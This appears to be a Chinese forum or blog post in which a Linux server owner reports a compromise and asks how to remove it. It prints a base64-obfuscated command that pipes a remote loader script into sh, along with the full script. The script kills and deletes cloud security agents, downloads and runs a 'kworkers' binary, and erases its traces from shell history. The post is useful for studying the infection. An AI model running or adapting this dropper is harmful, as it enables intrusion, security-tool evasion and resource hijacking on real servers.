linux被攻击的记录(linux服务器被攻击了)
linux服务器cpu标高
top
cpu高
查看进程信息
ps -ef | grep bash
bash进程信息
所以说通过执行下载远程脚本执行,进程杀不死,感觉像是无限循环在执行。。。
bash -c {echo,Y3VybCBodHRwOi8vbS53aW5kb3dzdXBkYXRlc3VwcG9ydC5vcmcvZC9sb2FkZXIuc2h8c2g=}|{base64,-d}|{bash,-i}
解密后获得脚本的实际地址为
echo "Y3VybCBodHRwOi8vbS53aW5kb3dzdXBkYXRlc3VwcG9ydC5vcmcvZC9sb2FkZXIuc2h8c2g="|base64 -d
curl http://m.windowsupdatesupport.org/d/loader.sh|sh
以下是执行的脚本内容
ps aux | grep -v grep | grep 'aegis' | awk '{print $11}' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'hids' | awk '{print $11}' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'cloudwalker' | awk '{print $11}' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'titanagent' | awk '{print $11}' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'edr' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'hids' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'edr' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'cloudwalker' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'titanagent' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'sgagent' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'barad_agent' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'hostguard' | awk '{print $2}' | xargs -I {} kill -9 {}
rm -rf /usr/local/aegis
rm -rf /usr/local/qcloud
rm -rf /usr/local/hostguard/bin
ps aux | grep -v grep | grep 'kworkers' | awk '{print $2}' | xargs -I {} kill -9 {}
domainroota=m.windowsupdatesupport.org
mkdir ~/.git
mkdir ./.git
gitdir=~/.git
if [ -d ~/.git ]; then
gitdir=~/.git
fi
if [ -d ./.git ]; then
gitdir=./.git
fi
rm -fv $gitdir/.lock
curl http://$domainroota/d/kworkers -o $gitdir/kworkers
chmod 777 $gitdir/kworkers
if [ -e /.dockerenv ]
then
$gitdir/kworkers
else
nohup $gitdir/kworkers >>$gitdir/.log&
fi
sed -i '/$domainroota/d' ~/.bash_history
请大神帮忙解读一下。怎么去除这个东西。。。
程序员的较量总是这么默默无闻。
,
免责声明:本文仅代表文章作者的个人观点,与本站无关。其原创性、真实性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容文字的真实性、完整性和原创性本站不作任何保证或承诺,请读者仅作参考,并自行核实相关内容。文章投诉邮箱:anhduc.ph@yahoo.com